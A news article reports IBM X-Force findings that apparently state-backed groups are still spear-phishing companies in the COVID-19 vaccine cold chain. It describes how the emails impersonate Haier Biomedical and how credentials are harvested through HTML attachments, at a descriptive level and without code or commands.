Threat Groups Still Target COVID-19 Vaccine Cold Chain

Advanced persistent threat groups continue to target the worldwide COVID-19 vaccine cold chain, based on an up-to-date IBM Security X-Force report. X-Force researchers publicized a report last December 2020 cautioning that cybercriminals were focusing on the COVID-19 cold chain to obtain access to vaccine information and attacks are still a big threat to the distribution and storage of vaccines.

There are presently over 350 logistics partners involved in the cold chain to ensure the distribution and safe-keeping of vaccines at cold temperatures. Since the preliminary report was released about cold chain phishing attacks, the researchers of IBM X-Force have discovered an additional 50 email message records linked with spear-phishing campaigns and listed 44 organizations in 14 countries across Europe, Asia, Africa, and the Americas.

The targeted companies support the transfer, warehousing, storage, and distribution of COVID-19 vaccines. The most targeted institutions engaged in transport, IT and electronic devices, and healthcare like firms in biomedical research, medical production, and pharmaceutical and hygiene providers.

Threat actors, thought to be supported by nation-states, have extended their campaigns and are utilizing spear phishing email messages to steal account information of CEOs, global sales officials, purchasing supervisors, HR officials, managers of plant engineering and others to get privileged understanding into national Advance Market Commitment (AMC) talks associated to the purchase of vaccines, time frames for distribution, data on the passage of vaccines via nations and territories, World Trade Organization (WTO) trade facilitation agreements, export regulations and international property rights, technical vaccine data, and other sensitive information.

The threat group responsible for this campaign appears to have complete knowledge of the vaccine cold chain. The email messages employed in the spear-phishing campaign act like an account manager from the Chinese biomedical firm, Haier Biomedical, which is the only complete cold chain supplier in the world.

The emails ask for price quotes for service contracts in connection with the Cold Chain Equipment Optimization Platform (CCEOP) program and reference merchandise like an ice-lined refrigerator and solar-powered vaccine refrigerator from Haier Biomedical. The email messages additionally talk about companies associated with petrochemical manufacturing and the production of solar panels that line up with those goods, and the language employed in the email shows the academic background of the email sender that is faked in the signature section.

The emails contain malicious HTML attachments that are opened locally, with the user required to give their login credentials to access the file. In case credentials are given, they are collected and copied to the command and control server of the attacker.

The researchers wrote that although the previous reporting showed direct targeting of supranational institutions, the energy and IT industries in six countries, it is believed that this growth is in line with the recognized attack pattern, and the campaign continues to be a purposive and computed threat.

With vaccine nationalism and worldwide competition associated with vaccine access, attacks that affect the cold chain were unavoidable. Although the researchers were unable to link the campaign to any criminal group, there is a good probability that this is a nation-state operation.

When the cold chain is disturbed it can lead to slowdowns transporting the vaccines or can affect the conditions needed to safely transport and store vaccines, which could make the vaccines unsafe or ineffective. IBM discussed Indicators of Compromise in its report to assist companies in the COVID-19 cold chain security against attacks.